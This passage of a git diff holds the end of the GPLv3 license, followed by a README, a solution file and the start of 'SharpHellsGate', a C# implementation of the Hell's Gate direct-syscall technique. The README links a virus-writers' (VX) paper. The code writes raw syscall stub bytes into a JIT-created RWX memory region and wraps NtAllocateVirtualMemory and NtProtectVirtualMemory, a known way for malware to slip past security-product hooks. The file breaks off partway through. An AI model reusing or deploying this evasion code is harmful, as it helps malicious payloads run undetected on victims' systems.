|
||||||
|
"aggregate" if the compilation and its resulting copyright are not
|
||||||
|
used to limit the access or legal rights of the compilation's users
|
||||||
|
beyond what the individual works permit. Inclusion of a covered work
|
||||||
|
in an aggregate does not cause this License to apply to the other
|
||||||
|
parts of the aggregate.
|
||||||
|
|
||||||
|
6. Conveying Non-Source Forms.
|
||||||
|
|
||||||
|
You may convey a covered work in object code form under the terms
|
||||||
|
of sections 4 and 5, provided that you also convey the
|
||||||
|
machine-readable Corresponding Source under the terms of this License,
|
||||||
|
in one of these ways:
|
||||||
|
|
||||||
|
a) Convey the object code in, or embodied in, a physical product
|
||||||
|
(including a physical distribution medium), accompanied by the
|
||||||
|
Corresponding Source fixed on a durable physical medium
|
||||||
|
customarily used for software interchange.
|
||||||
|
|
||||||
|
b) Convey the object code in, or embodied in, a physical product
|
||||||
|
(including a physical distribution medium), accompanied by a
|
||||||
|
written offer, valid for at least three years and valid for as
|
||||||
|
long as you offer spare parts or customer support for that product
|
||||||
|
model, to give anyone who possesses the object code either (1) a
|
||||||
|
copy of the Corresponding Source for all the software in the
|
||||||
|
product that is covered by this License, on a durable physical
|
||||||
|
medium customarily used for software interchange, for a price no
|
||||||
|
more than your reasonable cost of physically performing this
|
||||||
|
conveying of source, or (2) access to copy the
|
||||||
|
Corresponding Source from a network server at no charge.
|
||||||
|
|
||||||
|
c) Convey individual copies of the object code with a copy of the
|
||||||
|
written offer to provide the Corresponding Source. This
|
||||||
|
alternative is allowed only occasionally and noncommercially, and
|
||||||
|
only if you received the object code with such an offer, in accord
|
||||||
|
with subsection 6b.
|
||||||
|
|
||||||
|
d) Convey the object code by offering access from a designated
|
||||||
|
place (gratis or for a charge), and offer equivalent access to the
|
||||||
|
Corresponding Source in the same way through the same place at no
|
||||||
|
further charge. You need not require recipients to copy the
|
||||||
|
Corresponding Source along with the object code. If the place to
|
||||||
|
copy the object code is a network server, the Corresponding Source
|
||||||
|
may be on a different server (operated by you or a third party)
|
||||||
|
that supports equivalent copying facilities, provided you maintain
|
||||||
|
clear directions next to the object code saying where to find the
|
||||||
|
Corresponding Source. Regardless of what server hosts the
|
||||||
|
Corresponding Source, you remain obligated to ensure that it is
|
||||||
|
available for as long as needed to satisfy these requirements.
|
||||||
|
|
||||||
|
e) Convey the object code using peer-to-peer transmission, provided
|
||||||
|
you inform other peers where the object code and Corresponding
|
||||||
|
Source of the work are being offered to the general public at no
|
||||||
|
charge under subsection 6d.
|
||||||
|
|
||||||
|
A separable portion of the object code, whose source code is excluded
|
||||||
|
from the Corresponding Source as a System Library, need not be
|
||||||
|
included in conveying the object code work.
|
||||||
|
|
||||||
|
A "User Product" is either (1) a "consumer product", which means any
|
||||||
|
tangible personal property which is normally used for personal, family,
|
||||||
|
or household purposes, or (2) anything designed or sold for incorporation
|
||||||
|
into a dwelling. In determining whether a product is a consumer product,
|
||||||
|
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||||
|
product received by a particular user, "normally used" refers to a
|
||||||
|
typical or common use of that class of product, regardless of the status
|
||||||
|
of the particular user or of the way in which the particular user
|
||||||
|
actually uses, or expects or is expected to use, the product. A product
|
||||||
|
is a consumer product regardless of whether the product has substantial
|
||||||
|
commercial, industrial or non-consumer uses, unless such uses represent
|
||||||
|
the only significant mode of use of the product.
|
||||||
|
|
||||||
|
"Installation Information" for a User Product means any methods,
|
||||||
|
procedures, authorization keys, or other information required to install
|
||||||
|
and execute modified versions of a covered work in that User Product from
|
||||||
|
a modified version of its Corresponding Source. The information must
|
||||||
|
suffice to ensure that the continued functioning of the modified object
|
||||||
|
code is in no case prevented or interfered with solely because
|
||||||
|
modification has been made.
|
||||||
|
|
||||||
|
If you convey an object code work under this section in, or with, or
|
||||||
|
specifically for use in, a User Product, and the conveying occurs as
|
||||||
|
part of a transaction in which the right of possession and use of the
|
||||||
|
User Product is transferred to the recipient in perpetuity or for a
|
||||||
|
fixed term (regardless of how the transaction is characterized), the
|
||||||
|
Corresponding Source conveyed under this section must be accompanied
|
||||||
|
by the Installation Information. But this requirement does not apply
|
||||||
|
if neither you nor any third party retains the ability to install
|
||||||
|
modified object code on the User Product (for example, the work has
|
||||||
|
been installed in ROM).
|
||||||
|
|
||||||
|
The requirement to provide Installation Information does not include a
|
||||||
|
requirement to continue to provide support service, warranty, or updates
|
||||||
|
for a work that has been modified or installed by the recipient, or for
|
||||||
|
the User Product in which it has been modified or installed. Access to a
|
||||||
|
network may be denied when the modification itself materially and
|
||||||
|
adversely affects the operation of the network or violates the rules and
|
||||||
|
protocols for communication across the network.
|
||||||
|
|
||||||
|
Corresponding Source conveyed, and Installation Information provided,
|
||||||
|
in accord with this section must be in a format that is publicly
|
||||||
|
documented (and with an implementation available to the public in
|
||||||
|
source code form), and must require no special password or key for
|
||||||
|
unpacking, reading or copying.
|
||||||
|
|
||||||
|
7. Additional Terms.
|
||||||
|
|
||||||
|
"Additional permissions" are terms that supplement the terms of this
|
||||||
|
License by making exceptions from one or more of its conditions.
|
||||||
|
Additional permissions that are applicable to the entire Program shall
|
||||||
|
be treated as though they were included in this License, to the extent
|
||||||
|
that they are valid under applicable law. If additional permissions
|
||||||
|
apply only to part of the Program, that part may be used separately
|
||||||
|
under those permissions, but the entire Program remains governed by
|
||||||
|
this License without regard to the additional permissions.
|
||||||
|
|
||||||
|
When you convey a copy of a covered work, you may at your option
|
||||||
|
remove any additional permissions from that copy, or from any part of
|
||||||
|
it. (Additional permissions may be written to require their own
|
||||||
|
removal in certain cases when you modify the work.) You may place
|
||||||
|
additional permissions on material, added by you to a covered work,
|
||||||
|
for which you have or can give appropriate copyright permission.
|
||||||
|
|
||||||
|
Notwithstanding any other provision of this License, for material you
|
||||||
|
add to a covered work, you may (if authorized by the copyright holders of
|
||||||
|
that material) supplement the terms of this License with terms:
|
||||||
|
|
||||||
|
a) Disclaiming warranty or limiting liability differently from the
|
||||||
|
terms of sections 15 and 16 of this License; or
|
||||||
|
|
||||||
|
b) Requiring preservation of specified reasonable legal notices or
|
||||||
|
author attributions in that material or in the Appropriate Legal
|
||||||
|
Notices displayed by works containing it; or
|
||||||
|
|
||||||
|
c) Prohibiting misrepresentation of the origin of that material, or
|
||||||
|
requiring that modified versions of such material be marked in
|
||||||
|
reasonable ways as different from the original version; or
|
||||||
|
|
||||||
|
d) Limiting the use for publicity purposes of names of licensors or
|
||||||
|
authors of the material; or
|
||||||
|
|
||||||
|
e) Declining to grant rights under trademark law for use of some
|
||||||
|
trade names, trademarks, or service marks; or
|
||||||
|
|
||||||
|
f) Requiring indemnification of licensors and authors of that
|
||||||
|
material by anyone who conveys the material (or modified versions of
|
||||||
|
it) with contractual assumptions of liability to the recipient, for
|
||||||
|
any liability that these contractual assumptions directly impose on
|
||||||
|
those licensors and authors.
|
||||||
|
|
||||||
|
All other non-permissive additional terms are considered "further
|
||||||
|
restrictions" within the meaning of section 10. If the Program as you
|
||||||
|
received it, or any part of it, contains a notice stating that it is
|
||||||
|
governed by this License along with a term that is a further
|
||||||
|
restriction, you may remove that term. If a license document contains
|
||||||
|
a further restriction but permits relicensing or conveying under this
|
||||||
|
License, you may add to a covered work material governed by the terms
|
||||||
|
of that license document, provided that the further restriction does
|
||||||
|
not survive such relicensing or conveying.
|
||||||
|
|
||||||
|
If you add terms to a covered work in accord with this section, you
|
||||||
|
must place, in the relevant source files, a statement of the
|
||||||
|
additional terms that apply to those files, or a notice indicating
|
||||||
|
where to find the applicable terms.
|
||||||
|
|
||||||
|
Additional terms, permissive or non-permissive, may be stated in the
|
||||||
|
form of a separately written license, or stated as exceptions;
|
||||||
|
the above requirements apply either way.
|
||||||
|
|
||||||
|
8. Termination.
|
||||||
|
|
||||||
|
You may not propagate or modify a covered work except as expressly
|
||||||
|
provided under this License. Any attempt otherwise to propagate or
|
||||||
|
modify it is void, and will automatically terminate your rights under
|
||||||
|
this License (including any patent licenses granted under the third
|
||||||
|
paragraph of section 11).
|
||||||
|
|
||||||
|
However, if you cease all violation of this License, then your
|
||||||
|
license from a particular copyright holder is reinstated (a)
|
||||||
|
provisionally, unless and until the copyright holder explicitly and
|
||||||
|
finally terminates your license, and (b) permanently, if the copyright
|
||||||
|
holder fails to notify you of the violation by some reasonable means
|
||||||
|
prior to 60 days after the cessation.
|
||||||
|
|
||||||
|
Moreover, your license from a particular copyright holder is
|
||||||
|
reinstated permanently if the copyright holder notifies you of the
|
||||||
|
violation by some reasonable means, this is the first time you have
|
||||||
|
received notice of violation of this License (for any work) from that
|
||||||
|
copyright holder, and you cure the violation prior to 30 days after
|
||||||
|
your receipt of the notice.
|
||||||
|
|
||||||
|
Termination of your rights under this section does not terminate the
|
||||||
|
licenses of parties who have received copies or rights from you under
|
||||||
|
this License. If your rights have been terminated and not permanently
|
||||||
|
reinstated, you do not qualify to receive new licenses for the same
|
||||||
|
material under section 10.
|
||||||
|
|
||||||
|
9. Acceptance Not Required for Having Copies.
|
||||||
|
|
||||||
|
You are not required to accept this License in order to receive or
|
||||||
|
run a copy of the Program. Ancillary propagation of a covered work
|
||||||
|
occurring solely as a consequence of using peer-to-peer transmission
|
||||||
|
to receive a copy likewise does not require acceptance. However,
|
||||||
|
nothing other than this License grants you permission to propagate or
|
||||||
|
modify any covered work. These actions infringe copyright if you do
|
||||||
|
not accept this License. Therefore, by modifying or propagating a
|
||||||
|
covered work, you indicate your acceptance of this License to do so.
|
||||||
|
|
||||||
|
10. Automatic Licensing of Downstream Recipients.
|
||||||
|
|
||||||
|
Each time you convey a covered work, the recipient automatically
|
||||||
|
receives a license from the original licensors, to run, modify and
|
||||||
|
propagate that work, subject to this License. You are not responsible
|
||||||
|
for enforcing compliance by third parties with this License.
|
||||||
|
|
||||||
|
An "entity transaction" is a transaction transferring control of an
|
||||||
|
organization, or substantially all assets of one, or subdividing an
|
||||||
|
organization, or merging organizations. If propagation of a covered
|
||||||
|
work results from an entity transaction, each party to that
|
||||||
|
transaction who receives a copy of the work also receives whatever
|
||||||
|
licenses to the work the party's predecessor in interest had or could
|
||||||
|
give under the previous paragraph, plus a right to possession of the
|
||||||
|
Corresponding Source of the work from the predecessor in interest, if
|
||||||
|
the predecessor has it or can get it with reasonable efforts.
|
||||||
|
|
||||||
|
You may not impose any further restrictions on the exercise of the
|
||||||
|
rights granted or affirmed under this License. For example, you may
|
||||||
|
not impose a license fee, royalty, or other charge for exercise of
|
||||||
|
rights granted under this License, and you may not initiate litigation
|
||||||
|
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||||
|
any patent claim is infringed by making, using, selling, offering for
|
||||||
|
sale, or importing the Program or any portion of it.
|
||||||
|
|
||||||
|
11. Patents.
|
||||||
|
|
||||||
|
A "contributor" is a copyright holder who authorizes use under this
|
||||||
|
License of the Program or a work on which the Program is based. The
|
||||||
|
work thus licensed is called the contributor's "contributor version".
|
||||||
|
|
||||||
|
A contributor's "essential patent claims" are all patent claims
|
||||||
|
owned or controlled by the contributor, whether already acquired or
|
||||||
|
hereafter acquired, that would be infringed by some manner, permitted
|
||||||
|
by this License, of making, using, or selling its contributor version,
|
||||||
|
but do not include claims that would be infringed only as a
|
||||||
|
consequence of further modification of the contributor version. For
|
||||||
|
purposes of this definition, "control" includes the right to grant
|
||||||
|
patent sublicenses in a manner consistent with the requirements of
|
||||||
|
this License.
|
||||||
|
|
||||||
|
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||||
|
patent license under the contributor's essential patent claims, to
|
||||||
|
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||||
|
propagate the contents of its contributor version.
|
||||||
|
|
||||||
|
In the following three paragraphs, a "patent license" is any express
|
||||||
|
agreement or commitment, however denominated, not to enforce a patent
|
||||||
|
(such as an express permission to practice a patent or covenant not to
|
||||||
|
sue for patent infringement). To "grant" such a patent license to a
|
||||||
|
party means to make such an agreement or commitment not to enforce a
|
||||||
|
patent against the party.
|
||||||
|
|
||||||
|
If you convey a covered work, knowingly relying on a patent license,
|
||||||
|
and the Corresponding Source of the work is not available for anyone
|
||||||
|
to copy, free of charge and under the terms of this License, through a
|
||||||
|
publicly available network server or other readily accessible means,
|
||||||
|
then you must either (1) cause the Corresponding Source to be so
|
||||||
|
available, or (2) arrange to deprive yourself of the benefit of the
|
||||||
|
patent license for this particular work, or (3) arrange, in a manner
|
||||||
|
consistent with the requirements of this License, to extend the patent
|
||||||
|
license to downstream recipients. "Knowingly relying" means you have
|
||||||
|
actual knowledge that, but for the patent license, your conveying the
|
||||||
|
covered work in a country, or your recipient's use of the covered work
|
||||||
|
in a country, would infringe one or more identifiable patents in that
|
||||||
|
country that you have reason to believe are valid.
|
||||||
|
|
||||||
|
If, pursuant to or in connection with a single transaction or
|
||||||
|
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||||
|
covered work, and grant a patent license to some of the parties
|
||||||
|
receiving the covered work authorizing them to use, propagate, modify
|
||||||
|
or convey a specific copy of the covered work, then the patent license
|
||||||
|
you grant is automatically extended to all recipients of the covered
|
||||||
|
work and works based on it.
|
||||||
|
|
||||||
|
A patent license is "discriminatory" if it does not include within
|
||||||
|
the scope of its coverage, prohibits the exercise of, or is
|
||||||
|
conditioned on the non-exercise of one or more of the rights that are
|
||||||
|
specifically granted under this License. You may not convey a covered
|
||||||
|
work if you are a party to an arrangement with a third party that is
|
||||||
|
in the business of distributing software, under which you make payment
|
||||||
|
to the third party based on the extent of your activity of conveying
|
||||||
|
the work, and under which the third party grants, to any of the
|
||||||
|
parties who would receive the covered work from you, a discriminatory
|
||||||
|
patent license (a) in connection with copies of the covered work
|
||||||
|
conveyed by you (or copies made from those copies), or (b) primarily
|
||||||
|
for and in connection with specific products or compilations that
|
||||||
|
contain the covered work, unless you entered into that arrangement,
|
||||||
|
or that patent license was granted, prior to 28 March 2007.
|
||||||
|
|
||||||
|
Nothing in this License shall be construed as excluding or limiting
|
||||||
|
any implied license or other defenses to infringement that may
|
||||||
|
otherwise be available to you under applicable patent law.
|
||||||
|
|
||||||
|
12. No Surrender of Others' Freedom.
|
||||||
|
|
||||||
|
If conditions are imposed on you (whether by court order, agreement or
|
||||||
|
otherwise) that contradict the conditions of this License, they do not
|
||||||
|
excuse you from the conditions of this License. If you cannot convey a
|
||||||
|
covered work so as to satisfy simultaneously your obligations under this
|
||||||
|
License and any other pertinent obligations, then as a consequence you may
|
||||||
|
not convey it at all. For example, if you agree to terms that obligate you
|
||||||
|
to collect a royalty for further conveying from those to whom you convey
|
||||||
|
the Program, the only way you could satisfy both those terms and this
|
||||||
|
License would be to refrain entirely from conveying the Program.
|
||||||
|
|
||||||
|
13. Use with the GNU Affero General Public License.
|
||||||
|
|
||||||
|
Notwithstanding any other provision of this License, you have
|
||||||
|
permission to link or combine any covered work with a work licensed
|
||||||
|
under version 3 of the GNU Affero General Public License into a single
|
||||||
|
combined work, and to convey the resulting work. The terms of this
|
||||||
|
License will continue to apply to the part which is the covered work,
|
||||||
|
but the special requirements of the GNU Affero General Public License,
|
||||||
|
section 13, concerning interaction through a network will apply to the
|
||||||
|
combination as such.
|
||||||
|
|
||||||
|
14. Revised Versions of this License.
|
||||||
|
|
||||||
|
The Free Software Foundation may publish revised and/or new versions of
|
||||||
|
the GNU General Public License from time to time. Such new versions will
|
||||||
|
be similar in spirit to the present version, but may differ in detail to
|
||||||
|
address new problems or concerns.
|
||||||
|
|
||||||
|
Each version is given a distinguishing version number. If the
|
||||||
|
Program specifies that a certain numbered version of the GNU General
|
||||||
|
Public License "or any later version" applies to it, you have the
|
||||||
|
option of following the terms and conditions either of that numbered
|
||||||
|
version or of any later version published by the Free Software
|
||||||
|
Foundation. If the Program does not specify a version number of the
|
||||||
|
GNU General Public License, you may choose any version ever published
|
||||||
|
by the Free Software Foundation.
|
||||||
|
|
||||||
|
If the Program specifies that a proxy can decide which future
|
||||||
|
versions of the GNU General Public License can be used, that proxy's
|
||||||
|
public statement of acceptance of a version permanently authorizes you
|
||||||
|
to choose that version for the Program.
|
||||||
|
|
||||||
|
Later license versions may give you additional or different
|
||||||
|
permissions. However, no additional obligations are imposed on any
|
||||||
|
author or copyright holder as a result of your choosing to follow a
|
||||||
|
later version.
|
||||||
|
|
||||||
|
15. Disclaimer of Warranty.
|
||||||
|
|
||||||
|
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||||
|
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||||
|
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||||
|
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||||
|
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||||
|
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||||
|
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||||
|
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||||
|
|
||||||
|
16. Limitation of Liability.
|
||||||
|
|
||||||
|
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||||
|
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||||
|
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||||
|
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||||
|
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||||
|
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||||
|
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||||
|
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||||
|
SUCH DAMAGES.
|
||||||
|
|
||||||
|
17. Interpretation of Sections 15 and 16.
|
||||||
|
|
||||||
|
If the disclaimer of warranty and limitation of liability provided
|
||||||
|
above cannot be given local legal effect according to their terms,
|
||||||
|
reviewing courts shall apply local law that most closely approximates
|
||||||
|
an absolute waiver of all civil liability in connection with the
|
||||||
|
Program, unless a warranty or assumption of liability accompanies a
|
||||||
|
copy of the Program in return for a fee.
|
||||||
|
|
||||||
|
END OF TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
How to Apply These Terms to Your New Programs
|
||||||
|
|
||||||
|
If you develop a new program, and you want it to be of the greatest
|
||||||
|
possible use to the public, the best way to achieve this is to make it
|
||||||
|
free software which everyone can redistribute and change under these terms.
|
||||||
|
|
||||||
|
To do so, attach the following notices to the program. It is safest
|
||||||
|
to attach them to the start of each source file to most effectively
|
||||||
|
state the exclusion of warranty; and each file should have at least
|
||||||
|
the "copyright" line and a pointer to where the full notice is found.
|
||||||
|
|
||||||
|
<one line to give the program's name and a brief idea of what it does.>
|
||||||
|
Copyright (C) <year> <name of author>
|
||||||
|
|
||||||
|
This program is free software: you can redistribute it and/or modify
|
||||||
|
it under the terms of the GNU General Public License as published by
|
||||||
|
the Free Software Foundation, either version 3 of the License, or
|
||||||
|
(at your option) any later version.
|
||||||
|
|
||||||
|
This program is distributed in the hope that it will be useful,
|
||||||
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
GNU General Public License for more details.
|
||||||
|
|
||||||
|
You should have received a copy of the GNU General Public License
|
||||||
|
along with this program. If not, see <https://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
Also add information on how to contact you by electronic and paper mail.
|
||||||
|
|
||||||
|
If the program does terminal interaction, make it output a short
|
||||||
|
notice like this when it starts in an interactive mode:
|
||||||
|
|
||||||
|
<program> Copyright (C) <year> <name of author>
|
||||||
|
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||||
|
This is free software, and you are welcome to redistribute it
|
||||||
|
under certain conditions; type `show c' for details.
|
||||||
|
|
||||||
|
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||||
|
parts of the General Public License. Of course, your program's commands
|
||||||
|
might be different; for a GUI interface, you would use an "about box".
|
||||||
|
|
||||||
|
You should also get your employer (if you work as a programmer) or school,
|
||||||
|
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||||
|
For more information on this, and how to apply and follow the GNU GPL, see
|
||||||
|
<https://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
The GNU General Public License does not permit incorporating your program
|
||||||
|
into proprietary programs. If your program is a subroutine library, you
|
||||||
|
may consider it more useful to permit linking proprietary applications with
|
||||||
|
the library. If this is what you want to do, use the GNU Lesser General
|
||||||
|
Public License instead of this License. But first, please read
|
||||||
|
<https://www.gnu.org/licenses/why-not-lgpl.html>.
|
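--- a/Hells Gate/C# Implementation/README.md
+++ b/Hells Gate/C# Implementation/README.md
@@ -0,0 +1,11 @@
+## C# Hell's Gate ##
+C# Implementation of the Hell's Gate VX Technique
+<br />
+<br />
+Link to the paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf
+<br /> PDF also included in this repository.
+<br />
+<br />
+Link to the original C implementation: https://github.com/am0nsec/HellsGate
+<br />
+<br />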
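--- a/Hells Gate/C# Implementation/SharpHellsGate.sln
+++ b/Hells Gate/C# Implementation/SharpHellsGate.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30114.105
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpHellsGate", "SharpHellsGate\SharpHellsGate.csproj", "{F6A46854-FDC2-4F27-9051-5C7BE8E68733}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|Any CPU = Debug|Any CPU
+Release|Any CPU = Release|Any CPU
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.Build.0 = Debug|Any CPU
+{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.ActiveCfg = Release|Any CPU
+{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.Build.0 = Release|Any CPU
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+GlobalSection(ExtensibilityGlobals) = postSolution
+SolutionGuid = {CA2A2F5F-A135-4771-A014-A6F2C0D24538}
+EndGlobalSection
+EndGlobal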
278
Hells Gate/C# Implementation/SharpHellsGate/HellsGate.cs
Normal file
278
Hells Gate/C# Implementation/SharpHellsGate/HellsGate.cs
Normal file
@ -0,0 +1,278 @@
|
|||||||
|
using System;
|
||||||
|
using SharpHellsGate.Win32;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.Collections.Generic;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Runtime.CompilerServices;
|
||||||
|
|
||||||
|
namespace SharpHellsGate {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Main implementation of the Hell's Gate technique.
|
||||||
|
/// Responsible for generating a RWX memory region, inject and execute system call stubs.
|
||||||
|
/// </summary>
|
||||||
|
public class HellsGate {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Used to check if the RWX memory region was generated.
|
||||||
|
/// </summary>
|
||||||
|
private bool IsGateReady { get; set; } = false;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Used as for mutual exclusion while injecting and execution of the system call stub in memory.
|
||||||
|
/// </summary>
|
||||||
|
private object Mutant { get; set; } = new object();
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
///
|
||||||
|
/// </summary>
|
||||||
|
private Dictionary<UInt64, Util.APITableEntry> APITable { get; set; } = new Dictionary<ulong, Util.APITableEntry>() { };
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Address of the managed method that was JIT'ed.
|
||||||
|
/// </summary>
|
||||||
|
private IntPtr MangedMethodAddress { get; set; } = IntPtr.Zero;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Address of the RWX memory region after JIT compiling the managed method.
|
||||||
|
/// </summary>
|
||||||
|
private IntPtr UnmanagedMethodAddress { get; set; } = IntPtr.Zero;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// This function will be JIT at runtime to create RWX memory region.
|
||||||
|
/// </summary>
|
||||||
|
//// <returns>Gate returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
||||||
|
private static UInt32 Gate() {
|
||||||
|
return new UInt32();
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Inject in memory a basic system call stub and return a delegate for execution via un-managed code.
|
||||||
|
/// </summary>
|
||||||
|
/// <typeparam name="T">The desired delegate Type.</typeparam>
|
||||||
|
/// <param name="syscall">The system call to execute.</param>
|
||||||
|
/// <returns>A delegate of to execute the system call.</returns>
|
||||||
|
private T NtInvocation<T>(Int16 syscall) where T: Delegate {
|
||||||
|
if (!this.IsGateReady || this.UnmanagedMethodAddress == IntPtr.Zero) {
|
||||||
|
Util.LogError("Unable to inject system call stub");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
Span<byte> stub = stackalloc byte[24] {
|
||||||
|
0x4c, 0x8b, 0xd1, // mov r10, rcx
|
||||||
|
0xb8, (byte)syscall, (byte)(syscall >> 8), 0x00, 0x00, // mov eax, <syscall
|
||||||
|
0xf6, 0x04, 0x25, 0x08, 0x03, 0xfe, 0x7f, 0x01, // test byte ptr [SharedUserData+0x308],1
|
||||||
|
0x75, 0x03, // jne ntdll!<function>+0x15
|
||||||
|
0x0f, 0x05, // syscall
|
||||||
|
0xc3, // ret
|
||||||
|
0xcd, 0x2e, // int 2Eh
|
||||||
|
0xc3 // ret
|
||||||
|
};
|
||||||
|
|
||||||
|
Marshal.Copy(stub.ToArray(), 0, this.UnmanagedMethodAddress, stub.Length);
|
||||||
|
return Marshal.GetDelegateForFunctionPointer<T>(this.UnmanagedMethodAddress);
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtAllocateVirtualMemory native Windows function
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
|
||||||
|
/// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
|
||||||
|
/// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
|
||||||
|
/// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
|
||||||
|
/// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
|
||||||
|
/// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
|
||||||
|
/// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
private UInt32 NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect) {
|
||||||
|
lock (this.Mutant) {
|
||||||
|
Int16 syscall = this.APITable[Util.NtAllocateVirtualMemoryHash].Syscall;
|
||||||
|
if (syscall == 0x0000)
|
||||||
|
return Macros.STATUS_UNSUCCESSFUL;
|
||||||
|
|
||||||
|
DFunctions.NtAllocateVirtualMemory Func = NtInvocation<DFunctions.NtAllocateVirtualMemory>(syscall);
|
||||||
|
return Func(ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtProtectVirtualMemory native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
|
||||||
|
/// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
|
||||||
|
/// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
|
||||||
|
/// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
|
||||||
|
/// <param name="OldAccessProtection">Receive previous protection.</param>
|
||||||
|
/// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
private UInt32 NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 OldAccessProtection) {
|
||||||
|
lock (this.Mutant) {
|
||||||
|
Int16 syscall = this.APITable[Util.NtProtectVirtualMemoryHash].Syscall;
|
||||||
|
if (syscall == 0x0000)
|
||||||
|
return Macros.STATUS_UNSUCCESSFUL;
|
||||||
|
|
||||||
|
DFunctions.NtProtectVirtualMemory Func = NtInvocation<DFunctions.NtProtectVirtualMemory>(syscall);
|
||||||
|
return Func(ProcessHandle, ref BaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, out OldAccessProtection);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
